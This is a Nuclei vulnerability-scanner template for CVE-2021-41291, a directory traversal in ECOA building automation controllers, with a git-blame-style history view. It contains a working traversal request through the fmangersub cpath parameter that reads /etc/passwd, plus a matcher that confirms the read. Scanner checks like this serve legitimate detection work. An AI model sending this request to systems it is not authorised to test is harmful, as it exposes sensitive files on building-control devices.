nuclei-templates/cves/2021/CVE-2021-41291.yaml

id: CVE-2021-41291

info:
  name: ECOA Building Automation System - Directory Traversal Content Disclosure
  author: gy741
  severity: high
  description: The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php
    - https://www.twcert.org.tw/en/cp-139-5140-6343c-2.html
  tags: cve,cve2021,ecoa,lfi
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.50
    cve-id: CVE-2021-41291
    cwe-id: CWE-22

requests:
  - raw:
      - |
        GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
misc update 2021-10-14 14:38:44 +00:00			`id: CVE-2021-41291`
Create ecoa-building-directory-traversal.yaml The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-09-24 23:58:58 +00:00
			`info:`
			`name: ECOA Building Automation System - Directory Traversal Content Disclosure`
			`author: gy741`
			`severity: high`
			`description: The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device`
lint fix 2021-10-14 14:20:43 +00:00			`reference:`
Add vendor CERT advisory/cve 2021-10-14 12:59:38 +00:00			`- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php`
			`- https://www.twcert.org.tw/en/cp-139-5140-6343c-2.html`
tags update 2021-10-14 14:40:59 +00:00			`tags: cve,cve2021,ecoa,lfi`
Auto Generated CVE annotations [Thu Oct 14 14:40:51 UTC 2021] :robot: 2021-10-14 14:40:51 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`
			`cvss-score: 7.50`
			`cve-id: CVE-2021-41291`
			`cwe-id: CWE-22`
Create ecoa-building-directory-traversal.yaml The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-09-24 23:58:58 +00:00
			`requests:`
			`- raw:`
			`- \|`
Update and rename ecoa-building-directory-traversal.yaml to ecoa-building-lfi.yaml 2021-09-25 05:52:48 +00:00			`GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1`
Create ecoa-building-directory-traversal.yaml The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-09-24 23:58:58 +00:00			`Host: {{Hostname}}`

			`matchers:`
Update and rename ecoa-building-directory-traversal.yaml to ecoa-building-lfi.yaml 2021-09-25 05:52:48 +00:00			`- type: regex`
			`regex:`
misc update 2021-10-14 14:38:44 +00:00			`- "root:.*:0:0:"`